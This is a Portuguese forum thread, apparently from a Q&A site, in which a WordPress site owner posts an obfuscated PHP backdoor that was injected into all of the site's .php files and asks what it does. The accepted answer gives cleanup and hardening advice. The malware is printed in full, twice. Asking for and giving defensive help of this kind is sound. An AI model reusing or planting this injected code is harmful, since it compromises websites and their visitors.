# Código malicioso não identificado

Tags: php, wordpress

Galera, tenho um site que foi invadido (WordPress) e em todas as páginas .php foi adicionado o código abaixo:

```
<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277~6<Cw6<pd%w6Z6<.5`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!n`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB`SFTV`QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut`c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb`bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3`hA  x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv`ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys'; $fkynbfrz=explode(chr((712-592)),substr($ahwwxolsc,(39013-33136),(126-92))); $mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3-2)]); $xdyymr = $fkynbfrz[0]($fkynbfrz[(9-7)]); if (!function_exists('sopexje')) { function sopexje($hrabgt, $ufgoommd,$kdfsnldet) { $mklsjnqqyb = NULL; for($egbprqw=0;$egbprqw<(sizeof($hrabgt)/2);$egbprqw++) { $mklsjnqqyb .= substr($ufgoommd, $hrabgt[($egbprqw*2)],$hrabgt[($egbprqw*2)+(6-5)]); } return $kdfsnldet(chr((32-23)),chr((584-492)),$mklsjnqqyb); }; } $lywqws = explode(chr((291-247)),'1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17'); $xxnkkc = $mtsuxbm("",sopexje($lywqws,$ahwwxolsc,$xdyymr)); $mtsuxbm=$ahwwxolsc; $xxnkkc(""); $xxnkkc=(697-576); $ahwwxolsc=$xxnkkc-1; ?>
```

Queria saber o que realmente isso pode ter feito no meu site e se tem alguma maneira de limpar isso já que o código é o mesmo.

Valeu.

Organizei o código para facilitar o entendimento, segue abaixo:

```
<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277~6<Cw6<pd%w6Z6<.5`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!n`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB`SFTV`QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut`c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb`bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3`hA  x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv`ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys';
$fkynbfrz = explode(chr((712 - 592)), substr($ahwwxolsc, (39013 - 33136), (126 - 92)));
$mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3 - 2) ]);
$xdyymr = $fkynbfrz[0]($fkynbfrz[(9 - 7) ]);
if (!function_exists('sopexje')) {
    function sopexje($hrabgt, $ufgoommd, $kdfsnldet) {
        $mklsjnqqyb = NULL;
        for ($egbprqw = 0;$egbprqw < (sizeof($hrabgt) / 2);$egbprqw++) {
            $mklsjnqqyb.= substr($ufgoommd, $hrabgt[($egbprqw * 2) ], $hrabgt[($egbprqw * 2) + (6 - 5) ]);
        }
        return $kdfsnldet(chr((32 - 23)), chr((584 - 492)), $mklsjnqqyb);
    };
}
$lywqws = explode(chr((291 - 247)), '1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17');
$xxnkkc = $mtsuxbm("", sopexje($lywqws, $ahwwxolsc, $xdyymr));
$mtsuxbm = $ahwwxolsc;
$xxnkkc("");
$xxnkkc = (697 - 576);
$ahwwxolsc = $xxnkkc - 1; ?>
```

Comment: Depois de finalmente conseguir abrir sua pergunta, espero por uma resposta, fiquei curioso em saber mais sobre isso ;)

Comment: Caraca! Aqui tbm deu um belo delay, gostaria de entender melhor como funciona!

Comment: Normalmente nestes casos o mais simples é upar de novo sua cópia local. Agora, se você faz tudo direto na hospedagem, é uma boa hora de revisar o _modus operandi_, pois esse problema que você está tendo é só um de vários possíveis de se confiar na versão "hospedada". Fundamental ter sempre uma cópia local saudável do seu trabalho em mãos e pronta pra usar (nem que seja um backup convencional, desde que tenha um plano rápido de restore, claro).

Answer (score 3, accepted):

Na maioria dos casos, esse tipo de "invasão" acontece por conta de plugins desatualizados, versão do core desatualizada ou mesmo uso de temas já infectados.
Acontece muito, você as vezes quer ter um tema premium mas não quer pagar pelo serviço, então corre em qualquer blog ou torrent por ai e baixa o tema "free"... mas não verifica os scripts e cai em uma verdadeira cilada. Digo isso porque já fui vítima.

Primeiro passo é limpar seu código. Você pode simplesmente fazer um novo upload de código fonte (original da fonte do WP) ou sair desbravando arquivo por arquivo em busca de entradas maliciosas como essas. Não é muito difícil, elas normalmente seguem um padrão. Notepad++ vai ser seu herói se esse for o caso.

Segundo passo é evitar que isso aconteça novamente. Mude suas senhas, troque as hash keys. Não use esses temas piratas, não instale qualquer tipo de plugin e SEMPRE mantenha tudo atualizado na medida do possível.

Uma alternativa que me ajudou muito foi a de usar alguns plugins de segurança, como o Wordfence (free) ou Sitelock (pago) por exemplo. Ele vai ficar monitorando seus arquivos e comparando se o seu código sofreu alguma alteração que o deixe diferente da fonte original, ele te dá recursos para comparar, eliminar e se safar desse tipo de coisa. Existem várias ferramentas desse tipo no mercado, gratuitas e pagas, ai vai de acordo com sua necessidade.

E por fim, respondendo sua pergunta final: "O que isso pode ter feito no seu site?" Na melhor das hipóteses, nada! Na pior, podem ter usado seu site para enviar spam, você pode ter caído em uma blacklist e eles podem ter tido acesso aos seus dados de alguma forma, já que eles conseguiram editar seu fonte, pode ser que, dependendo de suas permissões, possam ter tido acesso ao wp-config. Mas isso é difícil de dizer sem um acesso mais amplo.